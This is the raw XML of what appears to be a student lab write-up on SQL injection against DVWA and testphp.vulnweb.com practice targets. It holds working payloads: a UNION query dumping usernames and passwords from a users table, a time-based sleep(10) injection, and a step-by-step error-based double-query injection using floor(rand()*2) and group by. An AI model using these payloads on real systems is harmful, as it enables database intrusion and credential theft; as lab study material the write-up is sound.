        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> where table_name=”users”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRDefault="00783E60" w:rsidP="00783E6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5E5B316" wp14:editId="281406C5">
            <wp:extent cx="5731510" cy="3222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164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60" w:rsidRDefault="00783E60" w:rsidP="00783E6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83E60" w:rsidRPr="00783E60" w:rsidRDefault="00783E60" w:rsidP="00783E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83E60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user,0x0a,password</w:t>
      </w:r>
      <w:r w:rsidRPr="00783E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from users</w:t>
      </w:r>
      <w:r w:rsidRPr="00783E60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRDefault="00783E60" w:rsidP="00783E6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5B85CC1" wp14:editId="4CCB3C24">
            <wp:extent cx="5731510" cy="3222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165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60" w:rsidRDefault="00783E60" w:rsidP="00783E6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83E60" w:rsidRDefault="00783E60" w:rsidP="00783E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rypt the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126E89" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60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25A632FE" wp14:editId="73FF0EDD">
            <wp:extent cx="5731510" cy="32226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166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27" w:rsidRPr="00CC2787" w:rsidRDefault="00162227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62227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="00783E60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87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TIME based</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2B6C" w:rsidRPr="00CC2787" w:rsidRDefault="006F2B6C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6F2B6C" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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42" w:history="1">
        <w:r w:rsidR="006F2B6C" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006F2B6C" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>' and sleep(10)--+ &amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2B6C" w:rsidRPr="00CC2787" w:rsidRDefault="006F2B6C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96473F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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33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27" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="004E040B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162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="00783E60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2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>DOUBLE QUERY SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="004E0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62227" w:rsidRDefault="00162227" w:rsidP="004E0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>select * from training</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00783E60" w:rsidRDefault="00783E60" w:rsidP="00783E6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 get the database table of training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227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03B56B5" wp14:editId="2F7A60BB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134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32" w:rsidRPr="00CC2787" w:rsidRDefault="00FA0632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FA0632" w:rsidRDefault="00FA0632" w:rsidP="004E0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>select count(*) from training</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60" w:rsidP="00783E6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get the number of columns present in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA0632" w:rsidRPr="00CC2787" w:rsidRDefault="00FA0632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6CD16F4" wp14:editId="74F66C13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35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32" w:rsidRPr="00CC2787" w:rsidRDefault="00FA0632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FA0632" w:rsidRDefault="00FA0632" w:rsidP="004E0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>select ra</w:t>
      </w:r>
      <w:r w:rsidR="0052311D" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60" w:rsidP="00783E6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get a random integer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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10A1A6B2" wp14:editId="2484B842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36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1D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRDefault="0052311D" w:rsidP="004E0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>select rand()*2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60" w:rsidP="00783E6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e the command multiple times to get the value greater than ‘1’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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9BB0DAE" wp14:editId="080888E8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37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1D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRDefault="0052311D" w:rsidP="004E0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>select floor(rand()*2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60" w:rsidP="00783E6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get the exact value ‘1’</w:t>
      </w:r>
      <w:r w:rsidR="00F47658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> or ‘0’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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35D3C2FB" wp14:editId="17EBD7C6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38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1D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRDefault="0052311D" w:rsidP="004E0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>select floor(rand()*2)jony</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60" w:rsidP="00783E6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get the name as </w:t>
      </w:r>
      <w:r w:rsidR="00F47658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>jony.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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1406C17" wp14:editId="2F7F7DC8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39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1D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D" w:rsidP="004E0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>select table_name,table_schema from information_schema.tables group by table_schema;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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72EA4F2B" wp14:editId="21EC098D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40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1D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D" w:rsidP="004E0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>select database();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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C3589B3" wp14:editId="6CF07BAE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41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1D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D" w:rsidP="004E0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>select(select database());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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1E18F47A" wp14:editId="3E67B287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42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1D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D" w:rsidP="004E0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>select concat(":",":",(select database()),":",":");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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92A0B79" wp14:editId="3D07153F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143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37" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E0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>select concat(":",":",(select database()),":",":")jony;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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123D8592" wp14:editId="5D39DFBE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44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37" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E0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>select concat(":",":",(select database()),":",":",floor(rand()*2))jony;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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D7B2048" wp14:editId="27925023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45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37" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E0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>select concat(":",":",(select database()),":",":",floor(rand()*2))jony from information_schema.columns;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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375D5A4B" wp14:editId="135DB814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146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37" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E0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>select count(*),concat(":",":",(select database()),":",":",floor(rand()*2))jony from information_schema.tables group by jony;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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B24D27B" wp14:editId="0EAB923A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147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37" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E040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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E0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>select count(*),concat(":",":",(select version()),":",":",floor(rand()*2))jony from information_schema.tables group by jony;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4537" w:rsidRPr="00F47658" w:rsidRDefault="009D4537" w:rsidP="00F4765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6D47F76E" wp14:editId="7CEC36B6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148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537" w:rsidRPr="00F476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A33" w:rsidRDefault="00363A33" w:rsidP="006D69E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00363A33" w:rsidRDefault="00363A33" w:rsidP="006D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A33" w:rsidRDefault="00363A33" w:rsidP="006D69E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00363A33" w:rsidRDefault="00363A33" w:rsidP="006D6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0C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B238A8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00BCE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4BA53DE"/>
    <w:lvl w:ilvl="0" w:tplc="4E407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81403"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D43C9E7E"/>
    <w:lvl w:ilvl="0" w:tplc="16E0E2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C5171A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D603232"/>
    <w:lvl w:ilvl="0" w:tplc="29A88C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CF00F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB6EBA0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00BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41A01852"/>
    <w:lvl w:ilvl="0" w:tplc="94B20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E9"/>
    <w:rsid w:val="00126E89"/>
    <w:rsid w:val="00162227"/>
    <w:rsid w:val="00363A33"/>
    <w:rsid w:val="004054FC"/>
    <w:rsid w:val="004E040B"/>
    <w:rsid w:val="0052311D"/>
    <w:rsid w:val="006D69E9"/>
    <w:rsid w:val="006F2B6C"/>
    <w:rsid w:val="00783E60"/>
    <w:rsid w:val="0096473F"/>
    <w:rsid w:val="009D4537"/>
    <w:rsid w:val="00BB5993"/>
    <w:rsid w:val="00CC2787"/>
    <w:rsid w:val="00E82DD3"/>
    <w:rsid w:val="00F47658"/>
    <w:rsid w:val="00F870CF"/>
    <w:rsid w:val="00FA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6871FD-93FB-4FFC-882C-34FB604E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9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9E9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006D6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stphp.vulnweb.com/listproducts.php?cat=-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hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1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hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=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php.vulnweb.com/listproducts.php?cat=1'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testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1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testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1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estphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1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0F88-49E1-4407-B5F0-60755656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0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ra L</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kiira L</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-02T11:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-03T12:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>